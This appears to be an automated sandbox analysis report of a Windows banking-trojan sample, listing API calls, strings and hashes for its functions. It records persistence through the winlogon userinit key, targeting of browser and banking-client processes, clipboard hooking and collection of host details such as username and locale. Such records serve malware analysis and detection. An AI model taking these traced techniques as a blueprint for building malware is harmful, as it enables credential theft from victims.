Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 004018CD
Part of subcall function 004017F0: memset.MSVCRT ref: 004018DD

Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 0040193A
Part of subcall function 004017F0: memset.MSVCRT ref: 0040194A
Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
Part of subcall function 004017F0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019B6
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019C5
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019D5

_snprintf.MSVCRT ref: 00401EAA

Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019E1
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019F4
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 00401A04

_snprintf.MSVCRT ref: 00401EEA
_snprintf.MSVCRT ref: 00401F26
SwitchToThread.KERNEL32(?,?,00404D20,?,?,?), ref: 00401F6F
NetApiBufferFree.NETAPI32(?), ref: 00401F95

Strings

%s12, xrefs: 00401ED8
%s123, xrefs: 00401F14
%s1, xrefs: 00401E98

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
String ID: %s1$%s12$%s123
API String ID: 1588441251-2882894844
Opcode ID: 63274706b62708f42648d06670bacef668267c51d1314ddcf6f9b5beb05922d2
Instruction ID: d6d119788ade0702c334ba716b850de2f597c51d849c979d1570e7f46e431759
Opcode Fuzzy Hash: 63274706b62708f42648d06670bacef668267c51d1314ddcf6f9b5beb05922d2
Instruction Fuzzy Hash: 5651B6B25043015BD331DB54C844EEB73A8AFD8754F000A2EFA846B2D1DB78DA48CBA6

Function 004027B0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON

Download Yara Rule

APIs

GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20112,?,?,00402D7C), ref: 004027B9
GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20112), ref: 004027CA
IsUserAnAdmin.SHELL32 ref: 004027D6
RtlAdjustPrivilege.NTDLL ref: 004027E6
IsUserAnAdmin.SHELL32 ref: 004027EC

Strings

explorer.exe, xrefs: 004027F8, 004027FD
Pn7w, xrefs: 004027E6
Fri Jun 17 05:52:09 20112, xrefs: 004027B4, 004027C5
winlogon.exe, xrefs: 004027F1

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: AdminAtomGlobalUser$AdjustFindPrivilege
String ID: Fri Jun 17 05:52:09 20112$Pn7w$explorer.exe$winlogon.exe
API String ID: 3001685711-3521715275
Opcode ID: d14c921f1184c696d62da8aac8ded89f8ce8efe24655d3e49b352df140887ec9
Instruction ID: 466661b1ea48edbd92509d7abf6a2a5afa49196c9ec5a44dbf6f5976db38d1d5
Opcode Fuzzy Hash: d14c921f1184c696d62da8aac8ded89f8ce8efe24655d3e49b352df140887ec9
Instruction Fuzzy Hash: 6AF08CB460020566EA5077E1AE0AB6B3A1CAB84B90F104137FF00B72E0EAB8DC0046FC

Function 00402ED0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00402ED7
GetProcessHeap.KERNEL32(00000000,00000300,004035BE,7644E610,00402EBE), ref: 00402EEF
HeapValidate.KERNEL32(00000000), ref: 00402EF2
GetProcessHeap.KERNEL32(00000000,00000300), ref: 00402EFF
HeapFree.KERNEL32(00000000), ref: 00402F02
GetProcessHeap.KERNEL32(00000000,004035BE,004035BE,7644E610,00402EBE), ref: 00402F0B
HeapValidate.KERNEL32(00000000), ref: 00402F0E
GetProcessHeap.KERNEL32(00000000,004035BE), ref: 00402F1B
HeapFree.KERNEL32(00000000), ref: 00402F1E

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Validate$String
String ID:
API String ID: 2629017576-0
Opcode ID: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
Instruction ID: 47c24e4de567f4ebe007c7ce519db5101e5d5be497eca443f574c4ff2f4d9865
Opcode Fuzzy Hash: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
Instruction Fuzzy Hash: 8BF0DAB1656211ABEA102BA59E8CF572A6CEF85B82F040525B708F71D0CAB4DC40D67C

Function 004014B0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004014D4
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,76D6DB30), ref: 004014DF
Process32First.KERNEL32 ref: 00401505
StrStrIA.SHLWAPI(?,?), ref: 00401520
Process32Next.KERNEL32(00000000,?), ref: 0040152C
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401548
CloseHandle.KERNEL32(00000000), ref: 0040155A

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
String ID:
API String ID: 3955875343-0
Opcode ID: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
Instruction ID: 35ff206d6e877699644ac5607af1a2cdaefe1b2aeb9dd15ae369335d4f3073ea
Opcode Fuzzy Hash: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
Instruction Fuzzy Hash: 1D11C3B25042146BD310DF65DC0899BBBACEBD53A0F00453AFE55A72D0E33499088BEA

Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040135A
GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373

Strings

ntdll.dll, xrefs: 00401362
RtlUniform, xrefs: 0040136D

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll
API String ID: 1545651562-3277137149
Opcode ID: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
Instruction ID: 796e466c09054be0152a46d456eb4211c9760dde1472f6724dae78271da73244
Opcode Fuzzy Hash: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
Instruction Fuzzy Hash: E80126712003045BC314AB6AAC81696B7DEAB84706341413BEE05F36A2C23AD8048BAC

Function 004012A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004012AB
GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC

Strings

ntdll.dll, xrefs: 004012B7
RtlUniform, xrefs: 004012C6

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll
API String ID: 1545651562-3277137149
Opcode ID: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
Instruction ID: b56d10f3903839679d055e287fe873ff32dc311f96dddc7098b711b9a384a0cf
Opcode Fuzzy Hash: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
Instruction Fuzzy Hash: 65E04FB07413045BD714BFB6AD09A1637DD9BC47073968036BB09F21E1DA39C814CA6D

Analysis Process: svchost.exePID: 4888, Parent PID: 1596COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	85.6%
Signature Coverage:	15.8%
Total number of Nodes:	1076
Total number of Limit Nodes:	24

Executed Functions

Function 02C85890 Relevance: 273.9, APIs: 123, Strings: 33, Instructions: 862threadmemorylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 02C73310: IsUserAnAdmin.SHELL32 ref: 02C73335
Part of subcall function 02C73310: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C73354
Part of subcall function 02C73310: PathAddBackslashA.SHLWAPI(?), ref: 02C73361
Part of subcall function 02C73310: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C7337E
Part of subcall function 02C73310: _snprintf.MSVCRT ref: 02C73399
Part of subcall function 02C73310: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C733B7
Part of subcall function 02C73310: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C7340C
Part of subcall function 02C73310: RegCloseKey.ADVAPI32(00000000), ref: 02C7341A

Part of subcall function 02C93E40: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C93E6F
Part of subcall function 02C93E40: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02C93EA8
Part of subcall function 02C93E40: _snprintf.MSVCRT ref: 02C93F13

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02C858B0
PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02C858BB
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C858CF
StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C858EB
GetCommandLineA.KERNEL32 ref: 02C858F5
GetCommandLineW.KERNEL32 ref: 02C8592D
InitializeCriticalSection.KERNEL32(02CBD888), ref: 02C8595C
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C85979
CreateThread.KERNEL32(00000000,00000000,02C82140,00000000,00000000,00000000), ref: 02C859B7
GetHandleInformation.KERNEL32(00000000,?), ref: 02C859CF
CloseHandle.KERNEL32(00000000), ref: 02C859E0
CreateThread.KERNEL32(00000000,00000000,02C868B0,00000000,00000000,00000000), ref: 02C85A0F
GetHandleInformation.KERNEL32(00000000,?), ref: 02C85A27
CloseHandle.KERNEL32(00000000), ref: 02C85A38
CreateThread.KERNEL32(00000000,00000000,Function_00016B60,00000000,00000000,00000000), ref: 02C85A4D
CreateMutexA.KERNEL32(00000000,00000000,7D2DE4ADa), ref: 02C85A61
InitializeCriticalSection.KERNEL32(02CBD8A0), ref: 02C85A70
CreateThread.KERNEL32(00000000,00000000,02C864A0,00000000,00000000,00000000), ref: 02C85A84
GetHandleInformation.KERNEL32(00000000,?), ref: 02C85A94
CloseHandle.KERNEL32(00000000), ref: 02C85AA5
CreateThread.KERNEL32(00000000,00000000,02C85590,00000000,00000000,00000000), ref: 02C85ABA
GetHandleInformation.KERNEL32(00000000,?), ref: 02C85ACA
CloseHandle.KERNEL32(00000000), ref: 02C85ADB
CreateThread.KERNEL32(00000000,00000000,02C842C0,00000000,00000000,00000000), ref: 02C85B05
GetHandleInformation.KERNEL32(00000000,?), ref: 02C85B19
CloseHandle.KERNEL32(00000000), ref: 02C85B2A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85B39
HeapValidate.KERNEL32(00000000), ref: 02C85B3C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85B49
HeapFree.KERNEL32(00000000), ref: 02C85B4C
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C85B70
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C85B82

Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,7D2DE31Fa,00000000,00000001,?,00000104), ref: 02C762D2
Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C

GetCurrentProcess.KERNEL32(00000000), ref: 02C85B8E
IsUserAnAdmin.SHELL32 ref: 02C85B9D
StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02C85BB9
StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02C85BE0
StrStrIA.SHLWAPI(?,\java.exe), ref: 02C85BF6
StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02C85C0C
StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02C85C22
StrStrIA.SHLWAPI(?,\opera.exe), ref: 02C85C38
StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02C85C4E
StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02C85C64
StrStrIA.SHLWAPI(?,\avant.exe), ref: 02C85C7A
StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02C85C90
StrStrIA.SHLWAPI(?,\safari.exe), ref: 02C85CA6
StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02C85CBC
StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02C85CD2
StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C85CE8
StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C85CFE
CreateThread.KERNEL32(00000000,00000000,02C8A300,00000000,00000000,00000000), ref: 02C85D2C
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85D46
CloseHandle.KERNEL32(00000000), ref: 02C85D53
CreateThread.KERNEL32(00000000,00000000,02C8D990,00000000,00000000,00000000), ref: 02C85D68
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85D7C
CloseHandle.KERNEL32(00000000), ref: 02C85D89
CreateThread.KERNEL32(00000000,00000000,02C8EF40,00000000,00000000,00000000), ref: 02C85D9E
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85DB2
CloseHandle.KERNEL32(00000000), ref: 02C85DBF
CreateThread.KERNEL32(00000000,00000000,02C8F770,00000000,00000000,00000000), ref: 02C85DD4
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85DE8
CloseHandle.KERNEL32(00000000), ref: 02C85DF5
CreateThread.KERNEL32(00000000,00000000,02C8E0B0,00000000,00000000,00000000), ref: 02C85E0A
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E1E
CloseHandle.KERNEL32(00000000), ref: 02C85E2B
CreateThread.KERNEL32(00000000,00000000,02C8B580,00000000,00000000,00000000), ref: 02C85E40
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E54
CloseHandle.KERNEL32(00000000), ref: 02C85E61
CreateThread.KERNEL32(00000000,00000000,02C8B620,00000000,00000000,00000000), ref: 02C85E76
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E8A
CloseHandle.KERNEL32(00000000), ref: 02C85E97
CreateThread.KERNEL32(00000000,00000000,02C8FEE0,00000000,00000000,00000000), ref: 02C85EAC
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85EC0
CloseHandle.KERNEL32(00000000), ref: 02C85ECD
CreateThread.KERNEL32(00000000,00000000,02C90AF0,00000000,00000000,00000000), ref: 02C85EE2
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85EF6
CloseHandle.KERNEL32(00000000), ref: 02C85F03
CreateThread.KERNEL32(00000000,00000000,02C917E0,00000000,00000000,00000000), ref: 02C85F18
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F2C
CloseHandle.KERNEL32(00000000), ref: 02C85F39
CreateThread.KERNEL32(00000000,00000000,02C918D0,00000000,00000000,00000000), ref: 02C85F4E
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F62
CloseHandle.KERNEL32(00000000), ref: 02C85F6F
CreateThread.KERNEL32(00000000,00000000,02C8E890,00000000,00000000,00000000), ref: 02C85F84
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F98
CloseHandle.KERNEL32(00000000), ref: 02C85FA5
CreateThread.KERNEL32(00000000,00000000,02C91AB0,00000000,00000000,00000000), ref: 02C85FBA
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85FCE
CloseHandle.KERNEL32(00000000), ref: 02C85FDB
CreateThread.KERNEL32(00000000,00000000,02C92A30,00000000,00000000,00000000), ref: 02C85FF0
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86004
CloseHandle.KERNEL32(00000000), ref: 02C86011
CreateThread.KERNEL32(00000000,00000000,02C92D50,00000000,00000000,00000000), ref: 02C86026
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8603A
CloseHandle.KERNEL32(00000000), ref: 02C86047
CreateThread.KERNEL32(00000000,00000000,02C902E0,00000000,00000000,00000000), ref: 02C8605C
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86070
CloseHandle.KERNEL32(00000000), ref: 02C8607D
CreateThread.KERNEL32(00000000,00000000,02C77110,00000000,00000000,00000000), ref: 02C86092
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C860AA
CloseHandle.KERNEL32(00000000), ref: 02C860BF
StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02C860D6
StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02C860EC
StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02C860FE
StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02C86110
StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02C86122
StrStrIA.SHLWAPI(?,\core.exe), ref: 02C86134
StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02C86146
StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02C86158

Part of subcall function 02C844F0: memset.MSVCRT ref: 02C84511
Part of subcall function 02C844F0: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7622F550,75AF7390,76230A60), ref: 02C84527
Part of subcall function 02C844F0: AddVectoredExceptionHandler.KERNEL32(00000001,02C73940), ref: 02C84534
Part of subcall function 02C844F0: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C8454F
Part of subcall function 02C844F0: CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C84569
Part of subcall function 02C844F0: GetHandleInformation.KERNEL32(00000000,?), ref: 02C84581
Part of subcall function 02C844F0: CloseHandle.KERNEL32(00000000), ref: 02C84592
Part of subcall function 02C844F0: InitializeCriticalSection.KERNEL32(02CBD870), ref: 02C845A3
Part of subcall function 02C844F0: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845B9
Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02C845CB
Part of subcall function 02C844F0: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845EA
Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02C845F8
Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02C84614
Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02C84630

Part of subcall function 02C76FB0: GetCurrentProcessId.KERNEL32 ref: 02C76FB9
Part of subcall function 02C76FB0: GetCurrentThreadId.KERNEL32 ref: 02C76FC8
Part of subcall function 02C76FB0: GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C76FE1
Part of subcall function 02C76FB0: GetUserObjectInformationA.USER32(00000000), ref: 02C76FE8
Part of subcall function 02C76FB0: lstrcmpiA.KERNEL32(?,7d2de3ada), ref: 02C76FFE

StrStrIA.SHLWAPI(?,\opera.exe,00000000), ref: 02C86183
GetModuleHandleA.KERNEL32(ntdll.dll,RtlFreeHeap,02C84010,02CC7D38), ref: 02C8619D
GetProcAddress.KERNEL32(00000000), ref: 02C861A0
StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C861B4
GetCurrentProcessId.KERNEL32 ref: 02C861D1
GetCurrentThreadId.KERNEL32 ref: 02C861E0
GetThreadDesktop.USER32(00000000,00000002,?,00000100,00000000), ref: 02C861F9
GetUserObjectInformationA.USER32(00000000), ref: 02C86200
lstrcmpiA.KERNEL32(?,7d2de3ada), ref: 02C86216
CreateThread.KERNEL32(00000000,00000000,02C7ACD0,00000000,00000000,00000000), ref: 02C8622A
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8623E
CloseHandle.KERNEL32(00000000), ref: 02C8624B
CreateThread.KERNEL32(00000000,00000000,02C77020,00000000,00000000,00000000), ref: 02C86260
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86274
CloseHandle.KERNEL32(00000000), ref: 02C86281

Strings

\firefox.exe, xrefs: 02C85C42
7D2DE7E1a, xrefs: 02C85AE6
\javaws.exe, xrefs: 02C85C16
ntdll.dll, xrefs: 02C86198
\chrome.exe, xrefs: 02C858DF, 02C85CDC, 02C861A8
\intpro.exe, xrefs: 02C860F2
kernel32.dll, xrefs: 02C85B64
\mnp.exe, xrefs: 02C85C84
\maxthon.exe, xrefs: 02C85C58
7D2DE4ADa, xrefs: 02C85A53
--no-sandbox, xrefs: 02C85908
7d2de3ada, xrefs: 02C8620A
\explorer.exe, xrefs: 02C85CF2
--no-sandbox, xrefs: 02C85949
\rundll32.exe, xrefs: 02C8613A
\clmain.exe, xrefs: 02C86116
\svchost.exe, xrefs: 02C85BAD
IsWow64Process, xrefs: 02C85B7C
\java.exe, xrefs: 02C85BEA
\isclient.exe, xrefs: 02C860CA
\opera.exe, xrefs: 02C85C2C, 02C86177
RtlFreeHeap, xrefs: 02C86193
\safari.exe, xrefs: 02C85C9A
\ipc_full.exe, xrefs: 02C860E0
\cbsmain.dll, xrefs: 02C86104
\netscape.exe, xrefs: 02C85CB0
C:\Users\user\AppData\Roaming\, xrefs: 02C858A3, 02C858B6
\iexplore.exe, xrefs: 02C85BD4
\javaw.exe, xrefs: 02C85C00
\avant.exe, xrefs: 02C85C6E
\core.exe, xrefs: 02C86128
\tbb-firefox.exe, xrefs: 02C85CC6
\notepad.exe, xrefs: 02C8614C

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Thread$CreateInformation$Close$AddressHeapProcProcess$Current$ModuleUsermemset$CriticalInitializeMutexPathSection$AdminBackslashCommandDesktopFileLibraryLineLoadNameObjectOpenQueryValueVolume_snprintflstrcmpi$AllocDirectoryEnvironmentExceptionFolderFreeHandlerSystemValidateVariableVectoredWindowslstrcpyn
String ID: --no-sandbox$ --no-sandbox$7D2DE4ADa$7D2DE7E1a$7d2de3ada$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
API String ID: 558288730-428555581
Opcode ID: 7632c9f1294aeafb7bec174db2dbf705998d76639d33d898e8d72797694d4a77
Instruction ID: 853c4c066e2a5854523634396e0bfcaf0d9341f37bcf380c5529ae26b42d1a77
Opcode Fuzzy Hash: 7632c9f1294aeafb7bec174db2dbf705998d76639d33d898e8d72797694d4a77
Instruction Fuzzy Hash: 4F52E971E81355B6FB21E7A08D46FAE77AC9F84B48F618594F901B70C1DBF0DB048AA4

Function 02C74920 Relevance: 135.3, APIs: 56, Strings: 21, Instructions: 596
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,75AF5CE0), ref: 02C74A4E
WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02C73EFD,00000000,02CCB0C4), ref: 02C74A76
WriteFile.KERNEL32(00000000,4.0.1,00000005,02C73EFD,00000000), ref: 02C74A88
WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74A9A
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C74AA9
WriteFile.KERNEL32(00000000,{Process: ,0000000A,02C73EFD,00000000), ref: 02C74ABF
WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74AEA
WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74AFC
GetUserNameA.ADVAPI32(?,00000104), ref: 02C74B09
WriteFile.KERNEL32(00000000,{Username: ,0000000B,02C73EFD,00000000), ref: 02C74B1F
WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74B4A
WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74B5C
GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02C74B6F
WriteFile.KERNEL32(00000000,{Processor: ,0000000C,02C73EFD,00000000), ref: 02C74B85
WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74BAA
WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74BBC
GetSystemDefaultLangID.KERNEL32 ref: 02C74BBE
memset.MSVCRT ref: 02C74BD7
WriteFile.KERNEL32(00000000,{Language: ,0000000B,02C73EFD,00000000), ref: 02C74C45
WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74C6A
WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74C7C
GetDC.USER32(00000000), ref: 02C74C81
GetDeviceCaps.GDI32(00000000), ref: 02C74C88
GetSystemMetrics.USER32(00000001), ref: 02C74C91
GetSystemMetrics.USER32(00000000), ref: 02C74C99
_snprintf.MSVCRT ref: 02C74CB1
WriteFile.KERNEL32(00000000,{Screen: ,00000009,02C73EFD,00000000), ref: 02C74CCA
WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74CEF
